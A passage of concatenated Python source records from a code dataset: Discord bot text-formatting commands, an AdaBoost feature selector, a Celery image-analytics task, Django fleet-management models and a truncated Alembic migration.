aliases=['randomcase', 'caserandom'])\n async def randomize_case(self, ctx: commands.Context, *, message: str):\n await ctx.send(\"\".join(random.choice((str1.upper(), str1.lower())) for str1 in message))\n\n @commands.command(name='flipthecoin!', help=\"Flips the coin!\", aliases=['flip', 'coinflip'])\n async def flip_the_coin(self, ctx: commands.Context):\n await ctx.send(f\"You got {str(random.choice(('Head', 'Tail'))).lower()}\")\n\n @commands.command(name='voter!', help='Helps you to decide anything!', aliases=['vote', 'voteforme'])\n async def voter(self, ctx: commands.Context, *, messages: str):\n await ctx.send(\n f\"Answer: {random.choice(messages.split(','))}\"\n )\n\n @commands.command(name=\"wikipedia\", help=\"Gives you the page in wikipedia\", hidden=True)\n async def wikipedia(self, ctx, search):\n result = wikipedia.search(search, results=1)\n page = wikipedia.page(result)\n await ctx.send(page)\n\n @commands.command(name=\"urban (WIP or Not Implemented)\", help=\"Give you the page from urban dictionary\", hidden=True)\n async def urban(self, search):\n pass\n\n @commands.command(help=\"Says what you sent using tts!\")\n async def echo(self, ctx, channel: Optional[discord.TextChannel] = None, *, message=None):\n if message is not None:\n if channel is None:\n await ctx.send(message, tts=True)\n else:\n await channel.send(message, tts=True)\n await ctx.send(\"Message sent\")\n else:\n await ctx.send(f\"Message is not filled. Please send the message to be sent. {ctx.author.mention}\")\n\n @commands.group(name=\"convert_to\", help=\"Converts a given string into a subcommand formatted string\")\n async def _convert_to(self, ctx: commands.Context):\n pass\n\n @_convert_to.command(help=\"Gives you up-side down text!\")\n async def up_down(self, ctx, *, string: str):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\\\;',./\"\n output_table = \"\".join(reversed(list(\"/˙',؛\\[]¿<>„:|{}+‾()*&^%$#@¡~0987654321ZʎXMΛ∩⊥SᴚὉԀONW˥ʞſIHƃℲƎᗡϽq∀zʎxʍʌnʇsɹbdouɯןʞɾıɥƃɟǝpɔqɐ\")))\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n output_reverse = \"\".join(reversed(list(output_string)))\n await ctx.send(output_reverse)\n\n @_convert_to.command(help=\"Gives you the reversed string!\")\n async def reverse(self, ctx, *, string: str):\n output_reverse = \"\".join(reversed(list(string)))\n await ctx.send(output_reverse)\n\n @_convert_to.command(help=\"Gives you a formatted Small-Caps\")\n async def small_caps(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"ᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘǫʀsᴛᴜᴠᴡxʏᴢABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n @_convert_to.command(help=\"Gives you a vapour-waved string\")\n async def vapour_wave(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:"<>?[]\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n @_convert_to.command(help=\"Gives you a monospaced string\")\n async def monospace(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"𝚊𝚋𝚌𝚍𝚎𝚏𝚐𝚑𝚒𝚓𝚔𝚕𝚖𝚗𝚘𝚙𝚚𝚛𝚜𝚝𝚞𝚟𝚠𝚡𝚢𝚣𝙰𝙱𝙲𝙳𝙴𝙵𝙶𝙷𝙸𝙹𝙺𝙻𝙼𝙽𝙾𝙿𝚀𝚁𝚂𝚃𝚄𝚅𝚆𝚇𝚈𝚉𝟷𝟸𝟹𝟺𝟻𝟼𝟽𝟾𝟿0~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n @_convert_to.command(help=\"Gives you a formatted string with cursive!\")\n async def cursive_script(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n @_convert_to.command(help=\"Gives you a currency styled a format!\")\n async def currency_styled_text(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"₳฿₵ĐɆ₣₲ⱧłJ₭Ⱡ₥₦Ø₱QⱤ₴₮ɄV₩ӾɎⱫ₳฿₵ĐɆ₣₲ⱧłJ₭Ⱡ₥₦Ø₱QⱤ₴₮ɄV₩ӾɎⱫ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n @_convert_to.command(help=\"Gives you a formatted old_english_styled string!\")\n async def old_english_style(self, ctx, *, string):\n input_table = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n output_table = \"𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐����𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ1234567890~!@#$%^&*()_+{}|:\\\"<>?[]\\;',./\"\n\n translation = string.maketrans(input_table, output_table)\n\n output_string = string.translate(translation)\n await ctx.send(output_string)\n\n\ndef setup(bot):\n bot.add_cog(Fun(bot))\n","repo_name":"SaiponathGames/OpenCityBot","sub_path":"Bot/cogs/Fun.py","file_name":"Fun.py","file_ext":"py","file_size_in_byte":10054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7274159774","text":"# adaboost.py\r\n\r\n# !/usr/bin/python \r\n\r\nimport numpy as np\r\n\r\nimport math\r\n \r\n\r\n# labels: nx1 array; 1 if example is instance of improvement, 3 if not\r\n# predictions: nxm array; 1 if feature m was active for example n, 3 if not\r\n# T: number of rounds (ie, number of features to be chosen)\r\n# returns features: 1xT array of chosen feature indices\r\ndef boost(predictions, labels, T=0):\r\n \r\n n = labels.size\r\n m = predictions.shape[1]\r\n if T == 0:\r\n T = (m + 2 - 1) / 2\r\n\r\n features = np.zeros(T)\r\n\r\n alpha = np.zeros(T, float)\r\n\r\n # error matrix: 1 if feature m made a mistake on input n, 0 else\r\n errors = np.zeros((n, m))\r\n for i in range(n):\r\n errors[i,:] = labels[i] * predictions[i,:]\r\n\r\n # reusable storage\r\n temp = np.zeros(m)\r\n\r\n # initialize distribution over examples\r\n D = np.ones(n)\r\n D = D / D.sum()\r\n\r\n used = []\r\n for t in range(T):\r\n \r\n # choose the best feature\r\n for i in range(m):\r\n if i in used:\r\n temp[i] = np.inf # disallow features to be chosen twice\r\n else:\r\n temp[i] = (D * (errors[:,i] < 0)).sum()\r\n used.append(temp.argmin())\r\n err, features[t] = temp.min(), temp.argmin()\r\n\r\n # update alpha and D\r\n alpha[t] = 0.5 * math.log((1 - err) / err)\r\n the_exp = np.exp(-(alpha[t]) * errors[:,features[t]])\r\n D = D * the_exp\r\n D = D / D.sum()\r\n\r\n return features.astype(int)\r\n \r\n \r\n","repo_name":"AlexeyMK/senior_design","sub_path":"adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6393343418","text":"from app import celery\nfrom celery.utils.log import get_task_logger\n\nfrom bridge.bridge_manager import BridgeManager\nfrom models.modelDetail import AiModelDetail\nfrom models.receiveJobs import ReceiveJobs\nfrom models.category import Category\nfrom models.subcategory import SubCategory\nfrom models.compliance import ShelfCompliance\nfrom utilities.category_Detail import CategoryDetail\nfrom utilities.category_Response import CategoryResponse\nfrom utilities.brand_Response import BrandResponse\nfrom utilities.complex_encoder import ComplexEncoder\nfrom utilities.rectangle2 import Rectangle2\nfrom utilities.point import Point\nfrom utilities.geometery_operation import is_point_within_dist_of_rect\nfrom utilities.geometery_operation import rectangle_contain\nfrom utilities.compliance_meta import ComplianceMetaData\n\nfrom utilities.constant import JOB_STATUS_DONE, JOB_STATUS_ERROR, JOB_STATUS_INSERTED, JOB_STATUS_PENDING, JOB_STATUS_COMMUNICATION_ERROR\n\nfrom utilities.common import get_url\nimport requests\nimport json\n\n\nlogger = get_task_logger(__name__)\n\ndef build_shelf_compliance(model_response_json, shelf_compliance): \n # collection of brand with coordinates\n # sample data formate\n # [item_or_brand_name, x, y, h, w]\n \n brand_tags_xy_data = model_response_json[\"MetaData\"] \n print_debug_detail(f\"{brand_tags_xy_data}\")\n compliance_collection = []\n shelf_coordinate_object = None\n for each_shelf in shelf_compliance: \n compliance_items = each_shelf.complianceItem.split(\",\")\n print_debug_info(f\"Shelf Name and Tag:- {each_shelf.shelfName, each_shelf.shelfTag}\")\n #get main shelf coordinate detail\n for single_item_coordinate in brand_tags_xy_data: \n if single_item_coordinate[0] == each_shelf.shelfTag:\n print_debug_info(f\"Actual Shelf Name is:- {single_item_coordinate[0]}\")\n shelf_coordinate_object = single_item_coordinate\n break\n \n print_debug_detail(f\"Shelf object -> {shelf_coordinate_object}\")\n if shelf_coordinate_object is not None:\n\n #creat shelf Rectangle object\n #logger.info(f\"{shelf_coordinate_object[2]} {float(shelf_coordinate_object[2]+10)}\")\n\n shelf_rectangle = Rectangle2(shelf_coordinate_object[1]-1,float(shelf_coordinate_object[2]-1),shelf_coordinate_object[3],shelf_coordinate_object[4])\n \n #logger.info(f\"finding shelf rectangle {shelf_rectangle.x,shelf_rectangle.y,shelf_rectangle.w,shelf_rectangle.h}\")\n \n find_item_inside_shelf = []\n #using loop searh compliance item in the shelf\n for each_item_coordinate in brand_tags_xy_data:\n predicted_item_name = each_item_coordinate[0]\n\n print_debug_info(f\"Inner item Name:- {predicted_item_name}\")\n\n #creat searchable item Rectangle object\n #find_rectangle = Rectangle(each_item_coordinate[1],each_item_coordinate[2],each_item_coordinate[3],each_item_coordinate[4]) \n #logger.info(f\"item object coordinate -> {find_rectangle.x,find_rectangle.y,find_rectangle.w,find_rectangle.h}\")\n\n item_xy_point = Point(each_item_coordinate[1], each_item_coordinate[2])\n print_debug_detail(f\"Inner item x,y value {each_item_coordinate[1]}, {each_item_coordinate[2]}\")\n \n #perform search\n is_rect_inside = is_point_within_dist_of_rect(shelf_rectangle, item_xy_point, dist=1) \n print_debug_detail(f\"Item found inside:- {is_rect_inside}\")\n if is_rect_inside:\n find_item_inside_shelf.append(predicted_item_name)\n \n print_debug_info(f\"Inside item found length: {len(find_item_inside_shelf)}\")\n if len(find_item_inside_shelf) > 0:\n #total compliance item formula using intersection of two sets\n comp_list_as_set = set(compliance_items)\n intersection = comp_list_as_set.intersection(find_item_inside_shelf)\n final_intersected_compliance_items = list(intersection)\n\n print_debug_info(f\"compliance items list {final_intersected_compliance_items}\")\n \n total_compliance_items_count = len(final_intersected_compliance_items)\n total_shelf_items_count = len(find_item_inside_shelf)\n total_ratio = total_compliance_items_count / total_shelf_items_count\n compliance_metadata = ComplianceMetaData(find_item_inside_shelf,\n final_intersected_compliance_items,\n each_shelf.shelfName,\n each_shelf.shelfTag,\n total_compliance_items_count,\n total_shelf_items_count,\n total_ratio,\n each_shelf.complianceLevel)\n compliance_collection.append(compliance_metadata)\n else:\n logger.info(f\"No Compliance item found\")\n\n print_debug_detail(f\"loop-end\")\n\n else:\n logger.info(f\"Shelf not found\")\n print_debug_detail(f\"main-loop-end\")\n \n json_string = json.dumps([ob.__dict__ for ob in compliance_collection], cls=ComplexEncoder)\n print_debug_detail(f\"Compliance Json data\")\n print_debug_detail(f\"{json_string}\")\n print_debug_info(f\"exit from build_shelf_compliance\")\n return json_string\n\ndef build_analytics(category_detail_obj, model_response_json): \n actual_group_data = None\n actual_group_name = []\n #build analytics information\n category_response = []\n #build topline information\n topline_response = []\n\n group_data = model_response_json['GroupData'] \n print_debug_info(f\"length of group_data is {len(group_data)}\")\n for v in group_data: \n actual_group_data = json.loads(v) \n for each_key in actual_group_data:\n actual_group_name.append(each_key['BRAND'])\n \n for cat_obj in category_detail_obj:\n tages = cat_obj.tages.split(\",\")\n not_found_brand = list(set(tages)-set(actual_group_name))\n found_brand = list(set(tages)-set(not_found_brand)) \n \n temp_tags_counter = []\n for fb in found_brand:\n ag_data_item = next(item for item in actual_group_data if item[\"BRAND\"] == fb)\n temp_tags_counter.append(BrandResponse(ag_data_item['BRAND'], ag_data_item['COUNT']))\n for nfb in not_found_brand:\n temp_tags_counter.append(BrandResponse(nfb,0))\n\n if cat_obj.dataContainer == \"Analytics\":\n print_debug_detail(\" Is Analytics Type \")\n category_response.append(CategoryResponse(cat_obj.category_name , cat_obj.subcategory_name, temp_tags_counter, cat_obj.show_type))\n else:\n print_debug_detail(\" Is TopLine Type \")\n topline_response.append(CategoryResponse(cat_obj.category_name , cat_obj.subcategory_name, temp_tags_counter, cat_obj.show_type))\n\n json_string = json.dumps([ob.__dict__ for ob in category_response], cls=ComplexEncoder)\n topline_json_string = json.dumps([ob.__dict__ for ob in topline_response], cls=ComplexEncoder)\n \n print_debug_detail(f\"Analytic Json data\")\n print_debug_detail(f\"{json_string}\")\n print_debug_detail(f\"Topline analytic Json data\")\n print_debug_detail(f\"{topline_json_string}\")\n print_debug_info(f\"exit from build_analytics\")\n return json_string, topline_json_string\n\ndef build_analytics_and_compliance(category_detail_obj, model_response, shelf_compliance):\n # temp for dev or testing\n #response_obj = requests.get(\"http://knowhow.markematics.net/ReceiveJobs/GetJobDetailById/2\")\n #logger.info(response_obj.text)\n # for dev or testing\n #model_response_json = json.loads(response_obj.text) \n \n # for live\n model_response_json = json.loads(model_response)\n\n print_debug_detail(\"model_response json loaded\") \n print_debug_detail(f\"{model_response_json}\")\n\n #build analytic json\n print_debug_info(\"Calling build analytics\") \n analytic_json, topline_json_string = build_analytics(category_detail_obj, model_response_json)\n \n #build compliance json\n print_debug_info(\"Calling build compliance\")\n compliance_json = build_shelf_compliance(model_response_json, shelf_compliance) \n\n # here rebuild the json object using [GroupData, UngroupData, BrandName, Compliance, Analytics] objects\n print_debug_info(\"Compiling Compliance & Analytics Json response\")\n json_response = json.dumps({\"GroupData\":model_response_json['GroupData'],\"UngroupData\":model_response_json['UngroupData'],\"BrandName\":model_response_json['BrandName'],\"Compliance\":compliance_json,\"Analytics\":analytic_json,\"Topline\":topline_json_string})\n print_debug_detail(json_response)\n return json_response\n\ndef print_debug_info(data):\n is_debug = True\n if is_debug:\n logger.info(data)\n\ndef print_debug_detail(data):\n is_debug = True\n if is_debug:\n logger.info(data)\n\n@celery.task()\ndef process_image(job_id, model_id, project_id):\n model_detail_obj = None\n received_job_obj = None\n\n category_detail_obj = []\n\n print_debug_info(\"process_image_call\")\n bridge = BridgeManager().get_Instance().get_Bridge()\n \n print_debug_info(\"getting_model_detail_call\") \n model_details = bridge.get_db().get_session().query(AiModelDetail).filter(AiModelDetail.modelID == model_id)\n\n for model in model_details:\n print_debug_info(f\"{model.id} {model.port} {model.url} {model.version} {model.modelJson} {model.status} {model.modelID}\")\n model_detail_obj = model\n logger.info(model_detail_obj)\n \n print_debug_info(\"getting_job_detail\")\n received_jobs = bridge.get_db().get_session().query(ReceiveJobs).filter(ReceiveJobs.id == job_id)\n for job in received_jobs:\n print_debug_info(f\"{job.unProcessedImage} {job.uri}\")\n received_job_obj = job\n logger.info(received_job_obj)\n\n print_debug_info(\"category_and_subcategory_loading\")\n category_obj = bridge.get_db().get_session().query(Category).filter(Category.projectId == project_id)\n\n print_debug_info(\"shelf_compliance_loading\")\n shelf_compliance_obj = bridge.get_db().get_session().query(ShelfCompliance).filter(ShelfCompliance.projectId == project_id)\n\n for category in category_obj:\n print_debug_info(f\"{category.categoryName}\") \n sub_category_obj = bridge.get_db().get_session().query(SubCategory).filter(SubCategory.categoryId == category.id) \n for sub_category in sub_category_obj:\n print_debug_info(f\"{sub_category.name}\")\n category_detail_obj.append(CategoryDetail(category.id, category.categoryName, category.dataContainer, category.categoryDescription, category.showType, sub_category.id, sub_category.name, sub_category.tages))\n\n # temp dev or testing analytics\n #build_analytics_and_compliance(category_detail_obj,\"\",shelf_compliance_obj)\n\n print_debug_info(\"checking_pending_job_status\")\n if received_job_obj != None:\n # Checking received job status\n if received_job_obj.requestStatus.lower() == JOB_STATUS_INSERTED:#len(received_job_obj.requestStatus.lower()) > 0:\n print_debug_info(received_job_obj.requestStatus)\n print_debug_info(f\"Updating status value from Inserted to Pending against {job_id}\")\n\n # Update received job status into PENDING \n bridge.get_db().get_session().query(ReceiveJobs).filter_by(id = job_id).update({ReceiveJobs.requestStatus:JOB_STATUS_PENDING})\n bridge.get_db().get_session().commit()\n \n # Generating image processing request url\n request_url = get_url(model_detail_obj.url, model_detail_obj.port, \"upload-image\")\n\n print_debug_info(f\"Generating image processing request url {request_url}\")\n try:\n # Sending image to model for analysis\n headers = {'Content-type': 'application/json'}\n request_data = {'data_url':received_job_obj.uri,'job_id':job_id}\n print_debug_info(f\"Request data inside {request_data}\") \n response_obj = requests.post(request_url, data = json.dumps(request_data), headers=headers)\n print_debug_info(response_obj.text)\n if response_obj.status_code == 200:\n\n # build live analytic \n print_debug_info(\"> Sending Request for Complianc & Analysis Building\") \n analytic_data = build_analytics_and_compliance(category_detail_obj, response_obj.text, shelf_compliance_obj) \n \n # Update received job status into DONE \n bridge.get_db().get_session().query(ReceiveJobs).filter_by(id = job_id).update({ReceiveJobs.requestStatus:JOB_STATUS_DONE,ReceiveJobs.dataResponse:analytic_data})\n bridge.get_db().get_session().commit()\n elif response_obj.status_code == 400 or response_obj.status_code == 500:\n # Update received job status into ERROR \n bridge.get_db().get_session().query(ReceiveJobs).filter_by(id = job_id).update({ReceiveJobs.requestStatus:JOB_STATUS_ERROR,ReceiveJobs.dataResponse:response_obj.status_code})\n bridge.get_db().get_session().commit()\n except:\n # Update received job status into ERROR \n bridge.get_db().get_session().query(ReceiveJobs).filter_by(id = job_id).update({ReceiveJobs.requestStatus:JOB_STATUS_COMMUNICATION_ERROR,ReceiveJobs.dataResponse:\"Communication Error\"})\n bridge.get_db().get_session().commit() \n else:\n print_debug_info(f\"Job does not proceed {received_job_obj.requestStatus}\")\n print_debug_info(\"updating_pending_job_status\")\n","repo_name":"technetbytes/Pythonic-Flask-Celery","sub_path":"app/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":14050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13336443242","text":"import disnake\nfrom disnake.ext import commands\nimport art\n\n\nclass Etc(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.slash_command(name=\"big-text\", brief=\"Makes the text a big boy!.\")\n async def cmd_big_text(self, inter, text: str = commands.Param(),\n font: str = commands.Param(desc='Python Art text2art supported fonts.', default='ascii')):\n \"\"\"\n big boy textifer\n :Context inter:\n :string text:\n \"\"\"\n try:\n await inter.response.send_message(f\"```{art.text2art(text, font=font)}```\")\n except art.artError:\n await inter.response.send_message(f\":exclamation: Something went wrong! Are you sure {font} exists within text2art?\")\n\n\ndef setup(bot):\n bot.add_cog(Etc(bot))\n","repo_name":"Planet-Express-Labs/Zoidberg-neo","sub_path":"cogs/etc.py","file_name":"etc.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22038676627","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom django.conf import settings\nfrom django.core.validators import MinValueValidator\n\nfrom django.db import models\n\n# Create your models here.\nfrom django.utils.translation import ugettext as _\nfrom sitetree.models import TreeItemBase\n\n\nclass SmartTreeItem(TreeItemBase):\n icon_css_class = models.CharField(_('CSS class of icon'), max_length=50, null=True, blank=True)\n show_icon = models.BooleanField(_('Show icon of this item'), default=False)\n\n\n# classes abstratas\nclass ModeloBasico(models.Model):\n \"\"\"\n Modelo padrao abstrato para controle de data e hora de criacao e modificacao\n \"\"\"\n criado_em = models.DateTimeField(_('Criando em'), auto_now_add=True, editable=False,\n help_text=_('Data e Hora em que este registro foi criado'))\n modificado_em = models.DateTimeField(_('Modificado em'), auto_now=True,\n help_text=_('Data e Hora em que este registro foi modificado'))\n\n criado_por = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name=\"%(app_label)s_%(class)s_criado_por\",\n null=True, editable=False)\n modificado_por = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name=\"%(app_label)s_%(class)s_modificado_por\",\n null=True,\n editable=False)\n\n esta_ativo = models.BooleanField(_(u'Esta ativo?'), default=True, help_text='')\n\n class Meta:\n abstract = True\n\n\nclass ModeloTemporal(ModeloBasico):\n \"\"\"\n Modelo padrao abstrato para controle de data e hora de criacao e modificacao e periodo de validade\n \"\"\"\n dtvalido_de = models.DateField(_('Data inicial de utilizacao'), auto_now_add=True, editable=False)\n dtvalido_ate = models.DateField(_('Data final de utilizacao'), blank=True, null=True)\n\n class Meta:\n abstract = True\n\n\n# class Colaborador(ModeloBasico):\n# \"\"\"\n# Ver apresentacao de um dos criadores do Django:\n# https://speakerdeck.com/freakboy3742/red-user-blue-user-myuser-auth-dot-user\n#\n# Verificar necessidade de utilização de models proxy\n# http://www.marinhobrandao.com/blog/proxy-models-quase-uma-bala-de-prata/\n# \"\"\"\n# nome = models.CharField(_('Nome'), max_length=40)\n# sobrenome = models.CharField(_('Sobrenome'), max_length=255)\n# identificador_unico = models.CharField(_('CPF'), max_length=255, unique=True)\n# data_nasc = models.DateField(_('Data de Nascimento'))\n# #usuario = models.OneToOneField('users.User', null=True, related_name='colaborador_user')\n#\n#\n# class Meta:\n# verbose_name = _('UserProfile')\n# verbose_name_plural = _('Colaboradores')\n# ordering = ['-nome', '-sobrenome']\n\n\nclass CNH(ModeloBasico):\n \"\"\"\n Categoria A – habilita a condução de veículo motorizado de duas ou três rodas, com ou sem carro lateral\n (motos, triciclos etc);\n\n Categoria B – habilita a condução de veículo motorizado, não abrangido pela categoria A, cujo peso bruto\n total não exceda a três mil e quinhentos quilogramas e cuja lotação não exceda a oito lugares, excluído o do\n motorista (carros de passeio);\n\n Categoria C – habilita a condução de veículo motorizado utilizado em transporte de carga, cujo peso bruto\n total exceda a três mil e quinhentos quilogramas (caminhões) e utilizado para transporte de até 8 pessoas.\n Para habilitar-se na categoria C, o condutor deve estar habilitado há, pelo menos, um ano na categoria B e\n não ter cometido nenhuma infração grave ou gravíssima, nem ser reincidente em infrações médias, durante os\n últimos doze meses.\n\n Categoria D – condutor de veículo motorizado utilizado no transporte de passageiros, cuja lotação exceda a\n oito lugares, excluído o do motorista (ônibus). Para habilitar-se na categoria D, o condutor deve estar habilitado\n há, pelo menos, um ano na categoria C ou há dois anos na categoria B e não ter cometido nenhuma infração grave ou\n gravíssima, nem ser reincidente em infrações médias nos últimos doze meses.\n\n Categoria E – condutor de combinação de veículos em que a unidade tratora se enquadre nas categorias B, C ou D e\n cuja unidade acoplada, reboque, semi-reboque ou articulada, tenha seis mil quilogramas ou mais de peso bruto total,\n ou cuja lotação exceda a oito lugares, ou, ainda, seja enquadrado na categoria trailer. Para habilitar-se na\n categoria E, o condutor deve estar habilitado na categoria D ou há, pelo menos, um ano na categoria C e não ter\n cometido nenhuma infração grave ou gravíssima, nem ser reincidente em infrações médias nos últimos doze meses.9\n \"\"\"\n # Choices\n CNHTipo = (\n ('A', 'Categoria A'),\n ('B', 'Categoria B'),\n ('C', 'Categoria C'),\n ('D', 'Categoria D'),\n ('E', 'Categoria E'),\n ('AB', 'Categoria AB'),\n ('AC', 'Categoria AC'),\n ('AD', 'Categoria AD'),\n ('AE', 'Categoria AE'),\n )\n\n numero_cnh = models.CharField(_('Número CNH'), max_length=12, )\n categoria = models.CharField(_('Categoria'), max_length=12, choices=CNHTipo)\n validade = models.DateField(null=True)\n\n\n class Meta:\n verbose_name = _('CNH')\n verbose_name_plural = _('CNHs')\n ordering = ['-numero_cnh', '-categoria', '-validade']\n\n def __unicode__(self):\n return 'CNH Nº: {0} - Categoria: {1} - Validade: {2}'.format(self.numero_cnh, self.categoria, self.validade)\n\n\n# class Condutora(Pessoa, CNH):\n# \"\"\"\n# Condutor teste\n# \"\"\"\n#\n# class Meta:\n# verbose_name = _('Condutor')\n# verbose_name_plural = _('Condutores')\n\n\n\n\nclass Produto(ModeloBasico):\n pass\n\n def __unicode__(self):\n return self.nome\n\n\nclass Fornecedor(ModeloBasico):\n nome = models.CharField(max_length=255)\n nome_fantasia = models.CharField(max_length=255)\n cnpj = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.nome_fantasia)\n\n\nclass Combustivel(models.Model):\n nome = models.CharField(max_length=50)\n\n def __unicode__(self):\n return self.nome\n\n class Meta:\n verbose_name = _('Combustivel')\n verbose_name_plural = _('Combustiveis')\n ordering = ['nome']\n\n\nclass Cor(models.Model):\n nome = models.CharField(max_length=50)\n\n def __unicode__(self):\n return self.nome\n\n class Meta:\n verbose_name = _('Cor')\n verbose_name_plural = _('Cores')\n ordering = ['nome']\n\n\nclass Orgao(ModeloTemporal):\n nome = models.CharField(max_length=255)\n sigla = models.CharField(max_length=20)\n\n def __unicode__(self):\n return self.nome\n\n#\n# class Acessorio(ModeloBasico):\n# descricao = models.CharField(max_length=255)\n# eh_obrigatorio = models.BooleanField(default=False, verbose_name=u'É obrigatório')\n#\n# def __unicode__(self):\n# return u'{0}'.format(self.descricao)\n#\n# class Meta:\n# verbose_name = u'Acessório'\n# verbose_name_plural = u'Acessórios'\n#\n#\n#\n#\n# COR_PLACA = (\n#\n# )\n#\n#\n#\n# class Periodo(models.Model):\n# data_inicial = models.DateTimeField()\n# data_final = models.DateTimeField()\n# descricao = models.TextField()\n#\n\n# class VeiculoPlaca(ModeloBasico):\n# placa = models.ForeignKey('Placa')\n# veiculo = models.ForeignKey('veiculos.Veiculo')\n#\n#\n# class EspecieTipoVeicular(models.Model):\n# pass\n#\n#\n# class UnidadeMedida(models.Model):\n# sigla = models.CharField(max_length=20)\n# descricao = models.TextField()\n#\n#\n# class ConsumoCombustivel(models.Model):\n# medido_em = models.DateTimeField(_('Medido em'), auto_now_add=True, editable=False)\n# ativo = models.BooleanField(_(u'Esta ativo?'), default=True)\n# consumo = models.DecimalField(decimal_places=2, max_digits=4)\n# veiculo = models.ForeignKey('veiculos.Veiculo', related_name='consumo_combustivel_veiculo')\n#\n#\n# class Odometro(models.Model):\n# valor = models.PositiveIntegerField()\n# data_registro = models.DateTimeField(auto_now_add=True)\n# tipo_registro = models.CharField(max_length=200, choices=(('entrada', 'Entrada'),\n# ('saida', 'Saida'))\n# )\n#\n# def __unicode__(self):\n# return '{0} - {1}'.format(self.valor, self.tipo_registro)\n\n\n# class AcessorioVeiculoConservacao(models.Model):\n# ESTADO_CONSERVACAO = (\n# ('bom', 'Bom'),\n# ('regular', 'Regular'),\n# ('imprestavel', 'Imprestavel'),\n# ('faltando', 'Faltando'),\n# )\n#\n# acessorio = models.ForeignKey('Acessorio')\n# veiculo = models.ForeignKey('veiculos.Veiculo')\n# conservacao = models.CharField(max_length=11, choices=ESTADO_CONSERVACAO)\n#\n# class Meta:\n# verbose_name = u'Acessório'\n# verbose_name_plural = u'Acessórios'\n#\n","repo_name":"luzfcb/sisposto","sub_path":"sisposto/apps/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9087,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15676100335","text":"\"\"\"added collection class\n\nRevision ID: 589e155746cf\nRevises: 3511e3ab31d9\nCreate Date: 2014-09-13 07:30:08.638095\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '589e155746cf'\ndown_revision = '3511e3ab31d9'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('custom_collections',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('pos_dept_id', sa.Integer(), nullable=True),\n sa.Column('title', sa.Text(), nullable=True),\n 